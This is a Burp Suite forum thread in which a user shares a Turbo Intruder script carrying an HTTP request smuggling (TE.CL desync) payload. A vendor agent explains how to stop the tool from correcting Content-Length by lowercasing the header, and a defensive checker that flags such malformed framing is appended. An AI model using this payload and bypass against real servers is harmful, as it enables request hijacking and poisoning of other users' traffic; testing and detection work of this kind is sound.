Burp Suite User Forum

Turbo Intruder: always updating Content-Length header

Nan | Last updated: Mar 19, 2020 12:42AM UTC

Hello, I have been trying to launch an HTTP Desync attack using Turbo Intruder. Here is my script:

    def queueRequests(target, wordlists):
        engine = RequestEngine(endpoint=target.endpoint,
                               concurrentConnections=5,
                               requestsPerConnection=1,
                               timeout=10,
                               pipeline=True,
                               maxRetriesPerRequest=0,
                               engine=Engine.THREADED,
                               )
        engine.start()

        attack = '''POST / HTTP/1.1
    Host: example.com
    Content-Length: 4
    Transfer-Encoding : chunked

    46
    POST /login HTTP/1.1
    Host: example.com
    Content-Length: 15

    kk
    0

    '''
        engine.queue(attack)
    .......

I am targeting an endpoint which I believe has the TE.CL vulnerability. For the above script (attack) to work, it's imperative that the 'Content-Length: 4' in the 'attack' request remains unchanged so that I can poison the vulnerable endpoint's receiving socket (with the request: 'POST /login HTTP/1.1....'). However, during my testing, I've noticed the 'Content-Length: 4' was always updated to 'Content-Length: 76', where 76 is the exact length of the message body of my 'attack' request, thus causing the failure of my Desync attack.

Any suggestions on how to avoid updating the 'Content-Length' header in this case? Did I not properly configure the Turbo Intruder?

Liam, PortSwigger Agent | Last updated: Mar 20, 2020 10:17AM UTC

You can change Content-Length to content-length. This bypasses Turbo Intruder’s auto-fixing of the value. Please let us know if you need any further assistance.
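
Added example, not part of the thread or of Turbo Intruder: a defender-side check in Python that flags the framing anomalies visible in the request from the question (whitespace before the colon in `Transfer-Encoding :`, both length headers present, a declared Content-Length that differs from the body). It matches header names case-insensitively, so the lowercase `content-length` form mentioned in the reply is flagged the same way; `framing_findings` and the sample bytes are constructed for illustration and assume the buffer holds exactly one captured request.

```python
# Constructed sample: the headers from the question with a short chunked body.
SAMPLE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Length: 4\r\n"
    b"Transfer-Encoding : chunked\r\n"
    b"\r\n"
    b"5\r\nhello\r\n0\r\n\r\n"
)


def framing_findings(raw: bytes) -> list:
    """Return framing anomalies found in one captured HTTP/1.1 request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    findings, fields = [], {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if not sep:
            findings.append("malformed-header-line")
            continue
        if name != name.rstrip(b" \t"):
            # RFC 7230 section 3.2.4: a server must reject this with 400.
            findings.append("whitespace-before-colon")
        # Field names are case-insensitive, so normalise before comparing.
        key = name.strip(b" \t").lower()
        fields.setdefault(key, []).append(value.strip(b" \t"))

    lengths = fields.get(b"content-length", [])
    if lengths and b"transfer-encoding" in fields:
        # RFC 7230 section 3.3.3: ought to be handled as an error.
        findings.append("cl-and-te-both-present")
    if len(set(lengths)) > 1:
        findings.append("conflicting-content-length")
    for declared in lengths:
        if not declared.isdigit() or int(declared) != len(body):
            findings.append("content-length-mismatch")
            break
    return findings


if __name__ == "__main__":
    print(framing_findings(SAMPLE))
```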
